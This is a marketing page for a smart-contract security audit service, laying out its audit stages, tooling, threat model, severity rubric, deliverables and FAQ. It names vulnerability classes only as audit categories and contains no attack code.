A senior-led, four-stage process backed by industry-leading static, dynamic, fuzzing, and formal-verification tooling — and line-by-line manual review by engineers who have shipped production audits for protocols securing over $1B in TVL.
No black boxes. Every Vibranium engagement follows the same disciplined workflow, with named senior auditors accountable from kick-off to final report.
We read your repo, model the threat surface, and agree the audit scope in writing.
Two senior engineers review every line. Static analysis, fuzzing and formal verification run in parallel.
You receive a written preliminary report with every finding classified, ranked and reproducible.
We review your fixes commit-by-commit and issue the publicly verifiable final report.
Tools find shallow bugs fast so our senior engineers can focus their time on the deep architectural ones machines miss. Here is the complete kit that ships with every engagement.
Industry-standard Solidity static analyzer. 90+ detectors for reentrancy, access-control, arithmetic, and inheritance bugs.
Symbolic execution of EVM bytecode. Catches integer overflow, unchecked calls, and unprotected suicide patterns.
Rust-based static analyzer with rapid CI integration. Complements Slither with newer detector classes.
Property-based fuzzer for Solidity invariants. We write protocol-specific properties and run millions of randomised transactions.
Stateful invariant fuzzing with custom handlers. Native to your repo, so findings ship as reproducible Forge tests.
Symbolic testing for Foundry. Proves selected invariants hold across all possible inputs — not just the ones a fuzzer guesses.
Industry-grade formal verification for safety-critical protocols. Used selectively where mathematical proofs add value over fuzzing.
Two senior engineers reading every line, every branch, every state transition. No tool replaces a human who has shipped production audits.
Before a single line is reviewed, we build an explicit model of who can attack what. Findings without a credible attacker are noise.
Any unauthenticated address calling public functions. We map every entry point, parameter constraint, and state-change side-effect.
Owner, admin, governance, multisig, and time-locked roles. What can each role do today, and what could they do if compromised?
How the protocol behaves when called by other contracts: flash loans, callbacks, reentrancy across pools, oracle manipulation, MEV.
Liquidation cascades, fee griefing, sandwich-resistance, donation attacks, share-inflation, just-in-time liquidity. Solidity-clean ≠ economically safe.
Storage-slot collisions, initializer races, proxy-implementation drift, migration replay. Upgradeable systems get a dedicated review pass.
Oracles, keepers, relayers, signers, bridges. Anything off-chain is a trust assumption that must be made explicit in the report.
Every finding is classified using a transparent rubric mapped to industry standards (SWC Registry, OWASP Smart Contract Top 10, CVSS-adapted impact scoring).
| Severity | Impact + Likelihood | Typical Examples |
|---|---|---|
| CRITICAL | Direct loss of user or protocol funds. Exploitable by any external attacker without privileged access. High likelihood. | Reentrancy draining vaults, signature replay, unauthorised mint, broken access control on privileged functions, oracle manipulation enabling free liquidations. |
| HIGH | Loss of funds under realistic conditions, or full DoS of core protocol functionality. Requires specific but plausible state. | Storage-slot collision in upgradeable proxy, share-inflation on first deposit, missing slippage protection, donation attacks on ERC-4626, broken pause guards. |
| MEDIUM | Partial fund loss, predictable griefing, or loss of yield. Either bounded impact or requires a privileged actor to misbehave. | Fee griefing, front-running of legitimate user actions, integer truncation rounding in user's favour, incorrect event emission breaking off-chain indexers. |
| LOW | Minor deviation from spec with negligible direct user impact. Best practice failure. | Missing zero-address checks, unused storage variables, gas-inefficient patterns, missing reentrancy guards on view-only externals. |
| INFORMATIONAL | Code quality, gas optimisation, NatSpec, naming. No security impact. | Style inconsistencies, missing NatSpec, gas savings via custom errors, recommendations for upgrading Solidity version. |
Every finding in a Vibranium report follows this exact structure — so your engineers can reproduce, fix, and verify each issue with zero ambiguity.
Exact deliverables — no surprises, no upsells.
Written PDF after Stage 2, before any fixes. All findings classified.
Public PDF with fix verification status, hosted on our CDN and yours.
Embeddable badge with your security score, linking to the published report.
Reproducible Forge tests for every Critical/High finding.
30 minutes with the audit lead to talk you through every finding.
Post-audit access to the audit team for follow-up questions, included.
The questions protocol CTOs actually ask us before signing.
Named senior engineers with 4+ years of Solidity audit experience. Every engagement is staffed with two senior auditors as primary reviewers. We never use unsupervised juniors and we never use offshore review mills.
1,000–3,000 LOC: 1–2 weeks. 3,000–8,000 LOC: 2–4 weeks. 8,000+ LOC or complex DeFi primitives: 4–8 weeks. Emergency audits with 48-hour turnaround are available at a premium — contact us.
We use LLMs as a triage layer on top of static analysis output to reduce noise, never as the primary reviewer. No finding ships in a report unless a named senior engineer has independently verified it with a reproducible PoC. AI is a force multiplier for our team, not a substitute.
No auditor — us, Trail of Bits, OpenZeppelin, Certora — can offer a zero-bug guarantee. What we offer is a transparent process, named-engineer accountability, 30 days of post-audit Q&A, and a discounted re-audit if a Critical issue is discovered in the audited scope within 90 days.
Yes. By default every Vibranium report is published as a public PDF after fix verification — that public verifiability is the whole point. We accept NDA-only engagements at a premium, but we strongly recommend public reports because they compound your protocol's security reputation.
Yes, selectively. Halmos and Certora are excellent for safety-critical primitives (AMM math, lending accounting, share accounting in vaults) where mathematical proofs add real value over fuzzing. We don't pretend FV is appropriate for every contract — that would be expensive theatre.
Yes — Rust (Solana, NEAR, CosmWasm, Substrate), Move (Aptos, Sui), Vyper, Cairo (StarkNet), and several Layer-1 native VMs. See our 22+ chains coverage in the homepage stats.
Senior-led audit. Public report. Named team. No black boxes.
Request Audit Book a Call